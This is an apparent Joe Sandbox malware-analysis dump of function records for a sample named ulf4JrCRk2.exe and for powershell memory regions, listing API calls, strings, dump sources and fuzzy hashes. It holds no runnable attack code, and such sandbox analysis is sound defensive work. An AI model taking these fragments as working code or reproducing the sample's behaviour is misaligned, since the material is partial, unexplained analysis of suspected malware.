                                                                                                • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                                                                                                APIs
                                                                                                • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: TextWindow
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$1033$reckling: Installing
                                                                                                • API String ID: 530164218-3157058741
                                                                                                • Opcode ID: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
                                                                                                • Instruction ID: afbb14256cc631d10caee281dea517f3a5a89f89e2cd0ba730366887019fa8a8
                                                                                                • Opcode Fuzzy Hash: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
                                                                                                • Instruction Fuzzy Hash: A411C2B1B04610ABC724DF15DC8092377BDEB84716328813BA84167391C63D9E029A98
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405787
                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405790
                                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 004057A1
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405781
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-297319885
                                                                                                • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                • Instruction ID: 5d0f413141f52f4d8e8af186490daeb449751c8a1e5703fa5fe58453a807c488
                                                                                                • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                • Instruction Fuzzy Hash: A4D0C9A2A059306AD3122655AC09F9B6A48CF56755B099077F200B62A2C67C5D418FFE
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                  • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1404258612-0
                                                                                                • Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                                                                • Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
                                                                                                • Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
                                                                                                • Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00404F7F
                                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0
                                                                                                  • Part of subcall function 00404038: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                • String ID:
                                                                                                • API String ID: 3748168415-3916222277
                                                                                                • Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                                                                • Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
                                                                                                • Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
                                                                                                • Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                                                                • WriteFile.KERNEL32(00000000,?,incarnations\Vaporized\hippogriff,00000000,?,?,00000000,00000011), ref: 0040250E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWritelstrlen
                                                                                                • String ID: incarnations\Vaporized\hippogriff
                                                                                                • API String ID: 427699356-2641171360
                                                                                                • Opcode ID: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
                                                                                                • Instruction ID: 15837e18a0899aebe372c1c9672940312f560d5d25332acc002067b6f94eb92f
                                                                                                • Opcode Fuzzy Hash: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
                                                                                                • Instruction Fuzzy Hash: 78F089B2A54244BFDB40EBB09E499EB76A4DB50305F14443FF141F61C2D6FC4941A76E
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004036C9,76F93410,004034D6,?), ref: 0040370C
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00403713
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-297319885
                                                                                                • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                                                                                • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                                                                                                • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                                                                                • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 004057CE
                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 004057DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-2743851969
                                                                                                • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                • Instruction ID: f40007591d3941cd74726badf399ab62381001b9e0dca56ace991d14a2ccaf85
                                                                                                • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                                                                • Instruction Fuzzy Hash: 4BD0A7B280CD705FF30352109C04B8F6A48CF16310F094063E040A71D0C2781C414BFD
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                                                                • lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
                                                                                                • CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
                                                                                                • lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                • Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
                                                                                                • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                • Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9354499e60198587ad4b173416f7aa8976016a645c4fd693de17f928a577be6d
                                                                                                • Instruction ID: c39c26274a74615c840e82b71288e95538a02e5d0c9a8b6e59352f12d7bc719e
                                                                                                • Opcode Fuzzy Hash: 9354499e60198587ad4b173416f7aa8976016a645c4fd693de17f928a577be6d
                                                                                                • Instruction Fuzzy Hash: A5528A38B01219CFDB24CF64E8557ADBBB2FF85304F1445AAD90AAB250EB30AD85DF51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fl$(fl
                                                                                                • API String ID: 0-1194790885
                                                                                                • Opcode ID: c29699c335ec00af67ff37ab7790b9764b6b67b2cbf507df71f68d61d3a81cd2
                                                                                                • Instruction ID: 70402958a748873d6498558cb0c6a74d3d54187a4ce4db89bea44e624973ff9f
                                                                                                • Opcode Fuzzy Hash: c29699c335ec00af67ff37ab7790b9764b6b67b2cbf507df71f68d61d3a81cd2
                                                                                                • Instruction Fuzzy Hash: 0AA25074A00205CFEB24DB68C454B9EB7B2EF85719F2481AAD9156F381DBB6EC41CF81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fl$(fl
                                                                                                • API String ID: 0-1194790885
                                                                                                • Opcode ID: 3bb4c88cf43c513b93fdf342aec59e53ae4e4c9705eb1c4bc4984a97fa1f4d8c
                                                                                                • Instruction ID: 1209877b7ff93daa34e7b7789e1ceac0dee24abb776e40b61b84fa142f2ba484
                                                                                                • Opcode Fuzzy Hash: 3bb4c88cf43c513b93fdf342aec59e53ae4e4c9705eb1c4bc4984a97fa1f4d8c
                                                                                                • Instruction Fuzzy Hash: 2EE1D5B4B002059FEB14DB68C491BEEB7B3AF88314F25C496D9016F395DB75EC428B91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fl$(fl
                                                                                                • API String ID: 0-1194790885
                                                                                                • Opcode ID: 3d2267b6b0b6e4e6a31a798524f1653bd771e738a10b3058f445c6a1e1c4d921
                                                                                                • Instruction ID: 0aaee1efc19c8332b7870fda102e3432651c2ffb080981763fbea04d8c162619
                                                                                                • Opcode Fuzzy Hash: 3d2267b6b0b6e4e6a31a798524f1653bd771e738a10b3058f445c6a1e1c4d921
                                                                                                • Instruction Fuzzy Hash: 34E14BB0B00219CFEB24DB54C885BEAB7B2AB85304F2085D6D6496F745DB72ED81CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fl
                                                                                                • API String ID: 0-423539152
                                                                                                • Opcode ID: 9c8337f0accb559382468c3e1f3ecb3a89ee7aaae386edb7f37e04161575c3c3
                                                                                                • Instruction ID: 61e472fd7898f29f6755a9641f9f573eaf84ad4c7ee36f50611771d88eb31dbd
                                                                                                • Opcode Fuzzy Hash: 9c8337f0accb559382468c3e1f3ecb3a89ee7aaae386edb7f37e04161575c3c3
                                                                                                • Instruction Fuzzy Hash: FFC1F2B4A002458FEB14DB58C890BEEBBB2EF89314F25C496D9016F395DB75EC42CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9660d08b51743c592b0779d565fc0082055683ce4873a2e9b00fce29556504e3
                                                                                                • Instruction ID: 638db6fb74955f6958bece2d259a68a7a5923c884691946d94062a2efa109b36
                                                                                                • Opcode Fuzzy Hash: 9660d08b51743c592b0779d565fc0082055683ce4873a2e9b00fce29556504e3
                                                                                                • Instruction Fuzzy Hash: 9B826074A00204DFEB20DB58C450BA9F7B2EF85719F24859AD9156F382DBB6EC81CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ea39324073b73d15483f59dbda30229956d527692abf859ffe2392af1bee2b7
                                                                                                • Instruction ID: 01674df9cc5a6b02858d9a982fc04d2e9c1834c8a95d06f896e4df37f1285b42
                                                                                                • Opcode Fuzzy Hash: 4ea39324073b73d15483f59dbda30229956d527692abf859ffe2392af1bee2b7
                                                                                                • Instruction Fuzzy Hash: F3524C74B002159FEB24DB18C851BAAB7B2FB84314F24C4D6D949AF351DBB2ED818F91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3a0cdc14bb2841f5efe48dd82623d8bdfa80bd4197f2e6a0c30c9a955371e614
                                                                                                • Instruction ID: 3264b64d5856d19db5ba1cc03a18b1333e457c625a4d7f04daf4839396227c61
                                                                                                • Opcode Fuzzy Hash: 3a0cdc14bb2841f5efe48dd82623d8bdfa80bd4197f2e6a0c30c9a955371e614
                                                                                                • Instruction Fuzzy Hash: 78424E74B002149FE724DB58C891BEAB7B2EB89304F1084D9DA496F355DBB2ED818FD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 933441e6a5b7a9afb9ec9be7a907ebb51f0e5c0705d9a384ad66d815d5c8a116
                                                                                                • Instruction ID: 7b95702680be80e0b1e1c12e46479c19fc0993125be88e736366affddbd8905c
                                                                                                • Opcode Fuzzy Hash: 933441e6a5b7a9afb9ec9be7a907ebb51f0e5c0705d9a384ad66d815d5c8a116
                                                                                                • Instruction Fuzzy Hash: B7324F74B002149FEB24DB58C851BAAB7B2EF84314F24C4D6D549AF391DBB2ED818F91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1556378715.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_4560000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd0a385b44dd65c2cfac3a76b8c9782583fa7ab36b150b260f4a2447fc09b66a
                                                                                                • Instruction ID: d3636e5bdfb4ce3c4a7d31cec7a4f68fafd2aee8fd8a1a5b203ec68ce1a80fd6
                                                                                                • Opcode Fuzzy Hash: fd0a385b44dd65c2cfac3a76b8c9782583fa7ab36b150b260f4a2447fc09b66a
                                                                                                • Instruction Fuzzy Hash: 93321674A01208EFDB15CFA8D484A9DFBF2BF49310F288559E805AB365C775ED81DB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad62fd0edf233e87ee7634a61ad5f6be9660370278d6bab571af4fb4f3ec6934
                                                                                                • Instruction ID: 326b76e2a272b10349c1e69d6dafc51f83ea7ab1a736c32501e66d4fdfc683c2
                                                                                                • Opcode Fuzzy Hash: ad62fd0edf233e87ee7634a61ad5f6be9660370278d6bab571af4fb4f3ec6934
                                                                                                • Instruction Fuzzy Hash: 18224E70B002149FE724DB58C891BEAB7B2EB89704F1084D5DA496F395DBB2ED818F91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1563365518.0000000007440000.00000040.00000800.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7440000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f7864ec0f758f18aa6f93c965f1bf94c87bdd021670bd6f27e27ae4f9bac0522
                                                                                                • Instruction ID: eb8e9b47bde5a7ee0424fbb29ebd0c7eef1882ca908bdb1906373649ee0c7432
                                                                                                • Opcode Fuzzy Hash: f7864ec0f758f18aa6f93c965f1bf94c87bdd021670bd6f27e27ae4f9bac0522
